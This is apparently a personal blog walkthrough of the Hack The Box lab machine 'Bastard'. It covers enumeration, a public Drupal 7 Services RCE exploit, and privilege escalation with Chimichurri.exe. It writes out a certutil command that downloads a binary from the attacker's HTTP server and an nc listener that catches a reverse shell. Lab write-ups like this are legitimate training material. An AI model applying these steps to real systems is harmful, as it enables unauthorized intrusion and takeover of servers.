[hackthebox]Bastard

bastard0

NMAP

nmap -sC -sV -oN bastard.nmap -vvv 10.10.10.9

Nmap scan report for 10.10.10.9
Host is up, received syn-ack (0.19s latency).
Scanned at 2020-06-04 20:03:24 +08 for 89s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT      STATE SERVICE REASON  VERSION
80/tcp    open  http    syn-ack Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun  4 20:04:53 2020 -- 1 IP address (1 host up) scanned in 89.47 seconds

Drupal

bastard1

I was using nikto -host 10.10.10.9 and found that there is a robots.txt, there are other text files as well, but the robots.txt may give good information about the web directories.
bastard2

changelog.txt

By reading robots.txt I found that there is a changelog.txt, this changelog.txt would give me the drupal versions.
bastard3

The version is found to be 7.54.
bastard4

Use the drupal exploit

By using duckduckgo I found there is a Drupal 7.x Services module unserialize() to RCE.
bastard5
There is a poc php code that uses sql injection exploit which produces the user.json and session.json, and the remote code execution exploit.
There are modifications needed on the original php code.
bastard6

On the $url I need to change to Bastard’s ip address http://10.10.10.9

There is a rest directory after enumeration with gobuster against http://10.10.10.9: gobuster dir -u http://10.10.10.9 --wordlist=/usr/share/wordlists/dirb/big.txt -s 200,301,302 -o bastard.go --timeout 30s
bastard7
So on $endpoint_path I change to /rest.

My searchsploit is updated and has this exploit.
bastard10

To copy this exploit over to my current directory I use searchsploit -p 41564
bastard9
My modification is below:
bastard8

To run the exploit php 41564.php.
bastard11

I used whoami to test the command execution and it worked.
bastard12

There are two json files which are fished out from the sql injection exploit but I will not be using them.

Privilege escaltion

I downloaded Chimichurri.exe to my attacker machine and will be uploading this local privilege escalation program to the Bastard machine.

I setup a simple http server with python3, python3 -m http.server 80, then I use the command execution to download the program certutil -f -urlcache http://10.10.14.3/Chimichurri.exe chimichurri.exe.
bastard13
bastard14

After chimichurri was uploaded, I set up nc -lvnp 4444 to wait for the connection.
On command execution I will use chimichurri 10.10.14.3 4444.
bastard15bastard16

bastard17

bastard18

bastard19

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s